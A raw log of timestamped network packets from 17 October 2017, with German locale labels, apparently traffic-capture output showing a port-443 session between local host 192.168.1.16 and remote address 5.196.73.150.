Okt 17, 2017 21:54:28.522232056 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.528976917 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.528999090 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.529011965 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.529134035 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.542984962 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.543006897 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.543015003 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.543171883 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.544419050 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.544457912 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.544466019 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.544604063 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.544811010 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.544827938 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.544837952 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.544970036 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.545073986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.545089960 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.545214891 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.545316935 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.545331955 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.545413017 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.545432091 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.545897961 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.558028936 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.558052063 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.558059931 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.558267117 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.558629990 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.558651924 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.558660030 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.558777094 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.563858986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.563880920 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.563889027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.564107895 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.564155102 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.564645052 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.592247963 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.592269897 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.592278004 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.592533112 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.593010902 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.593040943 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.593049049 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.593234062 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.593367100 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.593384027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.593394041 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.593827009 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.593858004 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.593982935 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.594000101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.594270945 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.594295025 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.594702005 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.594727993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.595151901 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.598624945 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.598647118 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.598655939 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.598865986 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.615422964 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.615443945 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.615452051 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.615709066 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.615963936 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.615982056 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.615993977 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.616110086 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.616307974 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.616322041 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.616333961 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.616749048 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.616781950 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.617193937 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.622569084 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.622591019 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.622826099 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.629805088 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.629827976 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.629836082 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.630048990 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.652378082 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.652400970 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.652409077 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.652652979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.652652025 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.652683020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.652705908 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.652811050 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.652825117 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.653115034 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.653150082 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.653539896 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.659035921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.659269094 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.673084021 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.673105955 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.673114061 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.673372984 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.673450947 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.673468113 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.673480988 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.674084902 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.674107075 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.674139023 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.674184084 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.674587965 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.674773932 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.674797058 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.674808025 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.675164938 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.675192118 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.675340891 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.675359011 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.675539970 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.675558090 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.675621033 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.675649881 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.676157951 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.680213928 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.680768967 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.688386917 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.688395977 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.688400030 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.688586950 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.688608885 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.688654900 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.688702106 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.688724041 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.689203978 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.719230890 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.719253063 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.719456911 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.721010923 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721033096 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721045971 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721168995 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.721544027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721565962 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721574068 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721690893 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.721795082 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721812010 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.721822977 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.722249985 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.722268105 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.722429991 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.722457886 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.722996950 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.726248026 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.726526022 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.745958090 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.745980978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.745987892 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.746103048 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.753218889 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.753243923 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.753252029 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.753739119 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.754581928 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.754601002 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.754715919 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.755476952 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.755498886 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.755507946 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.756031036 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.759680033 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.759702921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.759711027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.759821892 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.759838104 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.759953022 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.759975910 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.760344028 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.760386944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.760734081 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.782989979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.783013105 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.783020973 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.783121109 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.783145905 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.783665895 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.789824009 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.789853096 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.789865971 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.789993048 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.819720984 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.819756985 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.819780111 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.819956064 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.819972992 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.819986105 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.820075989 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.820106030 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.820105076 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.820137978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.820466995 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.820482016 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.820569992 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.820600986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.820986986 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.821017027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.821329117 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.821351051 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.821459055 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.821486950 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.822069883 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.822530031 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.822755098 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.822894096 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.822911024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.822921038 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.823313951 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.824538946 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.824561119 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.824568987 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.824776888 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.825793982 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.825817108 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.825825930 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.826031923 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.826611996 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.826632977 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.826642036 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.826875925 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.830341101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.830588102 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.854491949 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.854513884 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.854521990 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.854728937 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.859731913 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.859754086 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.859761953 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.860006094 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.861618042 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.861639977 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.861649036 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.861854076 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.869854927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.869878054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.869885921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.870091915 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.879791975 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.880019903 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.880568981 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.880605936 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.880835056 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.881268978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.881299973 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.881304979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.881503105 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.883084059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.883105993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.883114100 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.883261919 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.884772062 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.884793997 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.884802103 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.884952068 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.885431051 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.885452986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.885461092 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.885598898 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.886405945 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.886564016 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.886909008 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.886931896 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.886940002 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.887079954 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.950232029 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.950257063 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.950265884 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.950453043 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.951148987 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.951272964 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.951483011 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.951499939 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.951590061 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.957073927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957097054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957104921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957221031 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.957555056 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957571983 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957580090 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957704067 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.957853079 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957869053 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.957880020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958147049 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958161116 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958256960 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958272934 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958282948 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958288908 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.958311081 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958372116 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.958400011 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958415985 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958559036 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958585024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958597898 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958658934 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.958679914 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958694935 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958710909 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.958836079 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.959146023 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959290981 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.959310055 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959326029 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959343910 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959358931 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959372044 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959491968 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959507942 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959517956 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959624052 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959640026 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959714890 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.959734917 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959744930 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.959842920 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.960516930 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.964019060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.964042902 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.964051008 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.964157104 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.980902910 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.980926037 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.980933905 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.981055021 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.982397079 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.982511997 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.982528925 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.982531071 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.982549906 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.982822895 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.982839108 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.982949018 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.982969046 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.984235048 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.987987995 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.988010883 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.988130093 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.007596970 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.007618904 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.007740021 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.010658979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.010682106 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.010689974 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.010802031 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.011311054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.011333942 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.011342049 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.011449099 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.011883974 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.011998892 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.012288094 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.012305975 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.012314081 MESZ443491935.196.73.150192.168.1.16
